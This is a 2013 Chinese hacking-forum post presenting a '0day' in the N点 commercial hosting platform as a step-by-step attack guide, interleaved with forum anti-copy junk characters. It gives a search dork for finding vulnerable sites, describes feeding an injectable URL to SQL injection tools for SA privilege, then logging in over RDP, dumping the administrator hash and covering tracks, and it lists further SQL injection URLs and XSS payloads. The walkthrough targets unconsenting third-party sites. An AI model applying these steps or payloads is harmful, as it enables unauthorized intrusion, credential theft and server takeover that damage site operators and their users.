中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
5 P9 _" M8 h) C" L c7 b4 {
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
$ D' x ~% O6 n! ^& T4 l/ L
好吧 抱怨一下就行了 接下来关键的时候到了
) n- Y: d# x6 ~, Q( e
首先百度搜索关键字:inurl: (mmdatabase.asp)
6 b# z3 ~3 w$ B/ ]- B$ o5 [/ ^
我随便列举一个:
www.xxxx.com
. m* B# ~- S. q1 W4 e, T! r' d
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
' U9 \, `8 O& v! `9 `& K* @
扔入NBSI 或者啊D等各种傻逼工具后
) [" ]8 x# R) O- O+ c
你们会看到是SA权限
8 v+ X Q& u9 w" I$ A$ L `4 w: d
果断3389 上去 hash得到administrator密码
3 G; |5 ~7 O6 f
擦屁股走人~
2 R! T& \7 s0 F/ w- \2 Q
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
. ?- J o7 c- U4 S' v- ] [
5 k+ j. ~; p' Z: _
再附上其他几个漏洞页面
# u& d8 W" i' ~- D
SQL:
+ E! i9 X- m- E% l' f
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
. O! H* g$ F7 T, @
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
: `$ `2 a7 C; }9 R
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
D7 t9 h8 H( P" M# |
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
+ Q. [8 O" x* j" J3 e
XSS证明:
* h9 u: E! N2 C7 K
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
- D: p8 |% m/ D
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
. T5 S% G& b4 X' q
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
" R' W, z9 I/ G" f/ z
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
4 r3 |3 w$ V9 L4 }: b D3 O
还是星外吧 你们懂的
9 s( |& J" F' c- m- ], o
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
. u0 |. V4 E0 J" {& }
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
" Z2 z' c, N m' W
——-
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2